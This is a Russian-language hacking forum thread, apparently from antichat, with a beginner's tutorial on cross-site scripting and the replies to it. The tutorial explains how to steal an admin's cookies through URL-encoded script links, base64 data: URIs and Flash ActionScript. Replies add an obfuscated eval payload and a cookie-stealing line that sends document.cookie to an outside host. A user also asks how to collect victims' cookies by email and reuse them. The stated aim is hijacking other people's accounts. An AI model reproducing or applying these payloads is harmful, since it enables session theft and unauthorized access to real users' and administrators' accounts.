![]() |
Cross Site Scripting для новичков
Cross Site Scripting для новичков Целью являеться объединение всех начальных тем про XSS. Статью писал от себя, накопленными мной знаниями, некоторые моменты были взяты с разных источников. Кто выше МОА или знаком с XSS идем сюда Начнем с самого начала Для обнаружения XSS необходимо во все поля вписать следующий скрипт PHP код:
PHP код:
После закрытия код выглядит вот так: PHP код:
PHP код:
В ней используються символы: +,-,!,буквы латинского алфавита и цыфры, а они обычно не фильтруються :) Но к сажелению этот способ работает только под IE, и у вас должен стоять автовыбор кодировки. Пример работы можете посмотреть здесь PHP код:
> кодируется как +AD4- Более подробно можно почитать здесь Ну что ж, а что с этим делать спросите вы? - а вот что: Цитата:
а угнать чужие. Делаеться это так: Цитата:
ссылка со скриптом в таком виде будет выглядить очень подозрительной, для этого необходимо ее закодировать в url кодировку. Теперь скрипт будет выгледить вот так: PHP код:
PHP код:
PHP код:
PHP код:
Цитата:
Вот таким вот довольно простым способом мы угнали куки админа. Теперь остается их заменить, и вы админ =) С активными XSS дело намного проще. Цитата:
XSS нападения через протокол DATA Наверняка многие из вас не слышали о данном методе атак. Что б было понятно я расскажу о нем на примере. Цитата:
Смысл в том, что мы кодируем наш скрипт кодировкой base64, в данном случае <script>alert(document.cookie)</script> и выполняем его. Прелесть этого вида атаки в том, что XSS есть даже когда на сайте стоят фильтры. проверялась под Firefox/2.0.0.4 XSS нападение через Flash-анимации Заключаеться в следующем. 1. Находим сайт, где разрешено публичное добовление Flesh мультика 2. Откроем Macromedia Flash 3. Жмем правой кнопкой мыши по первому кадру и выбираем в появившемся меню Actions 4. Вписываем PHP код:
Впринцыпе у нас получиться активная XSS необходимо просто для пользы alert() заменить на код снифера =) PS 1.1 надеюсь статья поможет новичкам, старался расписать все доступным языком. пользовался матерьялами forum.antichat.ru, www.inattack.ru. 1.2 Прежде чем написать что это боян и копи-паст читаем пункт 1.1 |
допиши еще про заливку всяких файлов (картинки, txt, pdf) со скриптом.
|
Цитата:
Брался простой txt файл и в него прописывался PHP код:
Далее хакер отправлял письмо, только не с алертом, а с снифером и получал куки жертвы. |
Почитал бы про подробную реализацию во Феше с помошь action script.
|
invlose верно говорит : использовать XSS нападения через протокол DATA таким образом, как это описано в статье не выйдет => автор сам не разобрался в том о чем пишет => зачем тогда писать ??
все описано в статье очень и очень поверхностно, и почему-то весьма напоминает вот это: http://www.cyberinfo.ru/index.php?newsid=1078 =/ |
Ребята, та мне наплевать что вам не понравилось. Я рад что моя статья помогла новичкам. А насчет нападения через протокол DATA попробуйте убрать пробелы.
ps Я никогда не пишу того, что не понимаю. |
>> А насчет нападения через протокол DATA попробуйте убрать пробелы.
хмм.. в каком браузере и какой его версии ты увидел свои куки через self-contained xss? |
Цитата:
|
>> Юзаю только FireFox
версия? |
Цитата:
1 кодируеться в base64 PHP код:
PHP код:
PHP код:
Firefox/2.0.0.4 думаю на других работать тоже должно |
мдя, в ФФ1.5 и в minefild - срабатует нормально => ее можно считать браузерозависимой xss
в операх от 8 до 9-й версии такого эффекта не наблюдается.. (хотя и можно некоторым образом ее использовать) а ie вообще data не поддерживает.. беру свои слова насчет, того, что ты не разобрался в этой xss назад, но все же, статья получилась поверхностной и недоработанной: когда работаешь с xss - проверять ее работоспособность на наиболее популярных браузерах имхо ПРОСТО ОБЯЗАТЕЛЬНО.. если б ты проделал подобную работу сейчас бы не было тут наших споров и статья бы имела большую полезность.. |
имхо зря вы на него накинулись, афтор не задавался целью описать все апекты xss в подробностях.... ТО что надо для первого ознакомления и понимая сути присутствует....
Цитата:
Куки алертицца) |
На античате тысяча и одна статья как пихать <script>alert()</script , но никто не копает глубже.Вам не надоело писать одно и тоже ТЫСЯЧУ раз?
Код:
onclick='123["e"[0]+"v"[0]+"a"[0]+"l"[0]](alert(/1/)) |
Цитата:
|
Цитата:
Цитата:
|
Data -протокол (IE его не поддерживает), это относится к уязвимости ПО (Опера и к браузерам построенных на движке Gecko).
|
кул, я добрался до XSS )
тока вопросы появились, помогите ? - создал файлы : s.php, image.gif, .htaccess, 1.js, залил на хост, вопрос 1 (содержимое файла 1.js) : img=new Image(); img.src="http://cleric.16mb.com/image.gif?"+document.cookie; - так правильно ? вопрос 2 "скрипт, который крадет куки. Вот он:" : img = new Image(); img.src = "http://cleric.16mb.com/image.gif?"+document.cookie; - так ? вопрос 3 "и давать уже ссылку на наш скрипт" : http://www.site.ru/index.php?id= - как будет выглядеть в моем случае ? если сайт где все лежит такой : http://cleric.16mb.com/index.html |
докрутил s.php и вот что приходит..
IP: xx.xxx.x.xxx Adress: Query: что я сделал не так или не докрутил |
s.php :
а вот результат на почту приходит : IP: 85.115.248.xxx Adress: Query: вопрос где куки и как оне выглядят то ? |
Цитата:
P.S. Если не получается перечитай первый пост внимательно. P.S.S 111-сообщение. |
а как выглядит результат воопще ?
ато я может опять жду чего то не то.. схема в целом какая ? я даю линк в почту к примеру, оотуда по нему идут ко мне на хост где тырятся куки, мне приходит письмо...и че далше ? я так понимаю чужие куки надо взять и вставить к себе и тогда я перехожу без проблем туда.. сами знаете куда.. НО где они ? или я не так понял |
/thread20140.html
|
Цитата:
не умею читать.. |
Цитата:
|
| Время: 23:26 |